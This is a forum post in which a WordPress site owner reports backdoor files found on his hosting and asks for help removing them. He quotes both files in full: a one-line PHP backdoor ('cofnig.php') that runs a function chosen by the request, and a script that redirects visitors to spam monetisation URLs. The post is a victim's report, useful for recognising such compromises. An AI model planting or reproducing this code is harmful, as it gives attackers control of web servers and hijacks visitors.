Mike420
Junior Member
- Apr 13, 2013
- 145
- 30
Hi ,
Today i looked at one hosting and found some really fucked up code in some new files.
Someone is trying to make money from my new wordpress site without any visitors
Did a little search and found that its an backdoor.
But didnt find info how to remove this shit, there must be some more files...
Any help welcome...
cofnig.php
were.php - his money making links.....
Today i looked at one hosting and found some really fucked up code in some new files.
Someone is trying to make money from my new wordpress site without any visitors
Did a little search and found that its an backdoor.
But didnt find info how to remove this shit, there must be some more files...
Any help welcome...
cofnig.php
PHP:
<?php @array_diff_ukey(@array((string)$_REQUEST['password']=>1),@array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']); ?>were.php - his money making links.....
PHP:
<?php
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$android_urls = array (
'http://com-gem.net/rmpm.php?a=298712&c=wl_con&s=09AND',
'http://com-d5k.net/uzc.php?a=298712&c=wl_con&s=09AND',
'http://com-2a4.net/ttb.php?a=298712&c=wl_con&s=09AND',
);
$not_android_urls = array (
'http://com-gem.net/htbtp.php?a=314759&c=wl_con&s=09NR',
'http://com-d5k.net/adde.php?a=314759&c=wl_con&s=09NR',
'http://com-2a4.net/amz.php?a=314759&c=wl_con&s=09NR',
);
$n = mt_rand(0,count($not_android_urls)-1);
$rand_url=$not_android_urls[$n];
if ( $android == true)
{
$n = mt_rand(0,count($android_urls)-1);
$rand_url=$android_urls[$n];
}
?>
<meta http-equiv="refresh" content="2; url=<?php echo $rand_url;?> ">
